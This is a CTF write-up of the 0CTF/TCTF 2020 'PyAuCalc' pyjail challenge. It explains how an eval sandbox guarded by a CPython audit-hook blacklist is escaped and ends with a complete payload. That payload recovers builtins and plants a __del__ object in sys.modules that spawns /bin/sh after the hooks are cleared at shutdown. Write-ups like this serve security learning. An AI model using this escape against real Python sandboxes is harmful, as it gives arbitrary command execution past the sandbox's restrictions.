[0CTF/TCTF qualifiers 2020] PyAuCalc

This post originally appeared on the flagbot site; feel free to read it there. It is reproduced here for archival purposes and to collect all my posts in one place.

Robin Jadoul

Jun 29, 2020

0CTF/TCTF, organizers, python, pyjail

In this challenge, we’re looking at a modern type of pyjail escape. Upon first connecting, we’re told that the source code of the challenge is available, so we can have a look at that first.

#!/usr/bin/env python3

import pathlib
import re
import signal
import sys

import audit_sandbox

if sys.version_info[:3] < (3, 8, 2):
    raise RuntimeError('Python version too old')

WELCOME = f'''\
Welcome to PyAuCalc, an awesome calculator based on Python {'.'.join(map(str, sys.version_info[:3]))}!
(Type "source" to see my awesome source code!)
'''
SOURCE = pathlib.Path(__file__).read_text(encoding='utf-8')
SANDBOX = pathlib.Path(audit_sandbox.__file__).read_bytes()

# Calculators don't need hacking functions, ban them!
audit_sandbox.install_hook()
del audit_sandbox
del sys.modules['audit_sandbox']


def main():
    print(WELCOME)

    while True:
        try:
            expression = input('>>> ')
            # Calculators don't need non-ASCII characters.
            expression.encode('ascii')
        except EOFError:
            break
        except Exception:
            print('invalid expression')
            continue

        # No denial-of-service!
        signal.alarm(1)

        # Calculators don't need spaces.
        if not (expression := re.sub(r'\s', '', expression)):
            signal.alarm(0)
            continue

        # Feel free to inspect my super secure source code and sandbox!
        if expression == 'source':
            signal.alarm(0)
            print(SOURCE)
            continue
        if expression == 'sandbox':
            signal.alarm(0)
            print(SANDBOX)
            continue

        try:
            # Calculators don't need builtins!
            result = str(eval(expression, {'__builtins__': {}}))
            signal.alarm(0)
            print(result)
        except Exception:
            signal.alarm(0)
            print('invalid expression')


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        sys.exit(0)

So we see that our input is passed to eval without direct access to builtins, restricted to ASCII characters, and with all whitespace removed. There’s also some sandboxing/auditing going on through another module. As we can apparently download that as well, let’s go ahead and inspect it.
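
To get a feel for these restrictions before touching the remote service, the filtering can be reproduced locally. The following is a minimal sketch that copies the relevant lines from the source above; the function names sanitize and evaluate are my own and do not appear in the challenge.

```python
import re


def sanitize(expression: str) -> str:
    """Apply the same input filtering as the challenge's main loop."""
    expression.encode('ascii')            # raises UnicodeEncodeError on non-ASCII input
    return re.sub(r'\s', '', expression)  # drops spaces, tabs and newlines


def evaluate(expression: str):
    """Evaluate a filtered expression with an empty builtins table."""
    return eval(sanitize(expression), {'__builtins__': {}})


if __name__ == '__main__':
    attempts = ('1 + 2', "len('abc')", 'lambda x: x', '().__class__')
    for attempt in attempts:
        try:
            print(repr(attempt), '->', evaluate(attempt))
        except Exception as exc:
            # Report only the exception type, like a local debugging aid would.
            print(repr(attempt), '->', type(exc).__name__)
```

Plain arithmetic still works, names such as len are gone, and anything that depends on a space between two tokens stops parsing once the whitespace is removed. Attribute access on literals is untouched, which is what the rest of the exploit builds on.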

After downloading the sandbox and converting it to a proper file, we can see that it’s a python extension module. A quick trace through the module being constructed shows us that the install_hook function simply uses PySys_AddAuditHook to install an audit hook. This audit hook splits the name of every audit event on dots, checks each component against a blacklist, and kills the process when a component matches.

int hook(char *event,void *args,void *userdata) {
  int iVar1;
  char *pcVar2;
  char *__s1;
  undefined **ppuVar3;
  char *__s;
  long in_FS_OFFSET;
  char *pcStack72;
  long local_40;
  
  local_40 = *(long *)(in_FS_OFFSET + 0x28);
  pcVar2 = strdup(event);
  __s = pcVar2;
  if (pcVar2 == (char *)0x0) {
    fwrite("Insufficient memory.\n",1,0x15,stderr);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  do {
    __s1 = strtok_r(__s,".",&pcStack72);
    if (__s1 == (char *)0x0) {
      FUN_001010e0(pcVar2);
      if (local_40 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
        __stack_chk_fail();
      }
      return 0;
    }
    ppuVar3 = &blacklist;
    __s = "breakpoint";
    while( true ) {
      iVar1 = strcmp(__s1,__s);
      if (iVar1 == 0) {
        puts("Hacking attempt!");
        FUN_001010e0(pcVar2);
                    /* WARNING: Subroutine does not return */
        exit(1);
      }
      __s = (char *)0x0;
      if ((Elf64_Dyn *)ppuVar3 == _DYNAMIC) break;
      __s = (char *)((Elf64_Dyn *)ppuVar3)->d_tag;
      ppuVar3 = (undefined **)&((Elf64_Dyn *)ppuVar3)->d_val;
    }
  } while( true );
}

Enumerating the blacklist, we find the following event components are disallowed:

ctypes
fcntl
ftplib
glob
imaplib
import
mmap
msvcrt
nntplib
open
os
pdb
poplib
pty
resource
shutil
smtplib
socket
sqlite3
subprocess
syslog
telnetlib
tempfile
urllib
webbrowser
winreg
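
The matching rule of the hook can be approximated in pure Python. This is only a sketch of my reading of the decompiled C above, not the module's real source: the names BLACKLIST, is_blocked, audit_hook and install are made up, "breakpoint" is included because the decompiled loop compares against it first, and os._exit stands in for the C-level exit(1).

```python
import os
import sys

# Components from the list above, plus "breakpoint" (assumption: it is the
# first string the decompiled loop compares against).
BLACKLIST = frozenset("""
    breakpoint ctypes fcntl ftplib glob imaplib import mmap msvcrt nntplib
    open os pdb poplib pty resource shutil smtplib socket sqlite3 subprocess
    syslog telnetlib tempfile urllib webbrowser winreg
""".split())


def is_blocked(event: str) -> bool:
    """True if any dot-separated component of the event name is blacklisted."""
    return any(part in BLACKLIST for part in event.split('.'))


def audit_hook(event, args):
    """Python rendering of the hook: terminate as soon as an event matches."""
    if is_blocked(event):
        print('Hacking attempt!', flush=True)
        os._exit(1)


def install():
    """Register the hook. Not called here: a hook cannot be removed again."""
    sys.addaudithook(audit_hook)
```

With this rule, an event such as os.system is rejected because of its first component, while single-component events like exec or compile pass, since neither word is on the list.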

So it seems any file access, code execution and importing of modules not yet in sys.modules will result in the interpreter being stopped. From here, we see two possible ways forward: circumvent the audit events, or exploit the python interpreter so that we gain native code execution that can do these things without going through the python interpreter code that emits these events.

Let’s first build up some utility tools. Since we’re in an eval environment and not exec, we’d ordinarily turn to immediately executed lambdas to get convenient names for our variables, but the usual lambda x: ... form needs a space after the keyword, and our whitespace is stripped. Since we’re on a recent python version, however, we can use the walrus operator := instead. Our payload can take the form of a list, and e.g. [a:=21,a*2] as payload confirms we can have variable names now.

Then the classic pyjail techniques apply to get to existing modules and classes. In particular, we reach the class _frozen_importlib.BuiltinImporter so that we can load the builtins module and regain access to the builtins, including __import__, which we can still use for modules already in sys.modules. The first element in our payload list becomes y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'). We can see the alarm call in the given source, so we disable it right away, in case we want more time at some point: y.__import__('signal').alarm(0).

One last trick gets us around the restrictions on spaces and eval: exec is a function available through builtins, and we can encode a space inside a string as \x20, meaning we can now run nearly arbitrary python code by using y.exec("something\x20here",{"__builtins__":y.__dict__}).
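
The position of BuiltinImporter in the subclass list depends on the interpreter build, so the hard-coded index has to be looked up on a matching local python first. Below is a small sketch of how that lookup and the walrus check could be done; all function names are my own, and recover_builtins is defined but not called, because load_module is a deprecated importlib API and may behave differently on newer interpreters.

```python
def jail_eval(expression):
    """Evaluate an expression the way the challenge does: no builtins."""
    return eval(expression, {'__builtins__': {}})


def find_importer_index():
    """Run locally, outside the jail, to find BuiltinImporter's position."""
    for index, cls in enumerate(object.__subclasses__()):
        if cls.__name__ == 'BuiltinImporter':
            return index
    raise LookupError('BuiltinImporter not found')


def importer_expression(index):
    """Space-free expression that reaches the class from a tuple literal."""
    return f"().__class__.__base__.__subclasses__()[{index}]"


def recover_builtins(index):
    """Mirror the first payload element (relies on deprecated load_module)."""
    return jail_eval(importer_expression(index) + "().load_module('builtins')")


if __name__ == '__main__':
    print(jail_eval('[a:=21,a*2]'))          # names bound with := are usable later in the list
    index = find_importer_index()
    print(index, jail_eval(importer_expression(index)))
```

The index printed locally is only valid for the remote service if both sides run the same python build with the same set of loaded classes, which is why testing against the exact version reported in the welcome banner is worthwhile.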

With some Google searching, we easily found a blog post discussing how to work around audit hooks by using ctypes. Unfortunately, ctypes is not available in sys.modules, and its audit events are blacklisted as well.

At this point, we spent a fairly large amount of time manually tracing through calls in the cpython source code, hoping to find a code path that could give us a file read or exec without triggering an unwanted audit event (what we didn’t know then was that a file read would not even be enough to get the flag; we need full RCE). We found one interesting possibility: _posixsubprocess.fork_exec seems to fork and exec without dispatching an audit event. But alas, that module couldn’t be accessed either. It’s a builtin module and as such doesn’t need any open events, but the import event raised when trying to import it is blocked as well.

After some needed sleep and with a fresh head, we set off to try again. Going through the source code, we had noticed that the only way to completely remove hooks is when _PySys_ClearAuditHooks is called, which is obviously not directly available to our running python code, and only gets called during interpreter shutdown. Then inspiration struck: we could hook python code to run at some event during shutdown after the hooks were cleared. Looking at the cpython source code again, there were two clear options:

// From https://github.com/python/cpython/blob/v3.8.3/Python/pylifecycle.c#L1232
_PySys_ClearAuditHooks();

/* Destroy all modules */
PyImport_Cleanup();

/* Print debug stats if any */
_PyEval_Fini();

/* Flush sys.stdout and sys.stderr (again, in case more was printed) */
if (flush_std_files() < 0) {
    status = -1;
}

After the audit hooks are cleared, modules are cleaned up, and sys.stdout and sys.stderr are flushed once more. Our first attempt, overwriting sys.stderr with a custom object that has a flush method, already failed locally (though I’m not sure why). So we look at the modules instead. We want to inject something into sys.modules that can run code when it gets “cleaned up”. Luckily for us, there’s the magic method __del__, which is called when an object is about to be destroyed. We create our own class and object, inject it into sys.modules and wait for the interpreter to clean up the modules upon shutdown.

import os,sys
class X:
    def __del__(self):
        os.system("/bin/sh")
sys.modules["pwnd"] = X()
sys.exit()
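
Whether a hook is still active when such a finalizer runs can be checked locally with a harmless probe instead of a shell. The sketch below is my own test harness, not part of the challenge: it starts a child interpreter that installs a logging hook, parks an object in sys.modules, and raises a made-up event named demo.probe both during normal execution and from __del__. The outcome depends on the order of finalization steps in the interpreter being tested, so no expected output is given.

```python
import subprocess
import sys

# Script for the child interpreter. os.write and sys.audit are captured as
# default arguments so they stay reachable while the interpreter shuts down.
PROBE_SCRIPT = r'''
import os, sys

def hook(event, args, _write=os.write):
    if event == "demo.probe":
        _write(1, b"hook saw demo.probe\n")

sys.addaudithook(hook)

class Canary:
    def __del__(self, _audit=sys.audit, _write=os.write):
        _write(1, b"finalizer ran\n")
        _audit("demo.probe")   # reaches the hook only if it is still installed

sys.modules["canary"] = Canary()
sys.audit("demo.probe")        # sanity check during normal execution
'''


def run_probe():
    """Run the probe in a fresh interpreter and return its output lines."""
    result = subprocess.run([sys.executable, '-c', PROBE_SCRIPT],
                            capture_output=True, text=True, check=True)
    return result.stdout.splitlines()


if __name__ == '__main__':
    lines = run_probe()
    print('\n'.join(lines))
    seen = lines.count('hook saw demo.probe')
    print('hook still active in finalizer' if seen > 1 else 'hook gone in finalizer')
```

With the ordering quoted from pylifecycle.c above, the hook line should appear only once, before the finalizer message. An interpreter that clears its hooks at a different point during shutdown would print it a second time.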

Encoding this as a string without any spaces and passing it through our exec trick, we get a shell. Then we just need to run /readflag to obtain the flag and be on our merry way. The flag turns out to be flag{bytecode_exploit_to_pwn_python_and_bypass_audit_hook_36c3879ea297210820301ce1}. Oops, it looks like we got an unintended solution there, and the intended approach was to get code execution and circumvent the interpreter instead.
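
The encoding step is mechanical, so it can be scripted rather than done by hand. Here is a minimal sketch of such a helper; encode_source and survives_filter are hypothetical names, and the helper escapes every whitespace character as \xNN, which is slightly more uniform than the mix of \x20, \n and \t used in the final payload.

```python
import re


def encode_source(source: str) -> str:
    """Return a double-quoted string literal for source without any whitespace."""
    source.encode('ascii')                      # the server rejects non-ASCII input
    pieces = []
    for ch in source:
        if ch in '"\\':
            pieces.append('\\' + ch)            # keep quotes and backslashes literal
        elif ch.isspace():
            pieces.append('\\x%02x' % ord(ch))  # space becomes \x20, newline \x0a
        else:
            pieces.append(ch)
    return '"' + ''.join(pieces) + '"'


def survives_filter(payload: str) -> bool:
    """True if the challenge's whitespace stripping leaves the payload unchanged."""
    return re.sub(r'\s', '', payload) == payload


if __name__ == '__main__':
    snippet = "import os,sys\nclass X:\n\tpass\n"
    literal = encode_source(snippet)
    print(literal, survives_filter(literal))
```

The resulting literal can be dropped in as the first argument of the y.exec(...) call; evaluating it gives back the original source, including its newlines and indentation.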

So would our exploit be avoidable? Given that hooks are added by a module, it seems that in the general case the order cannot simply be reversed: cleaning up the modules before the hooks have been removed is risky, since a hook might rely on its module still existing.

Final payload

[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]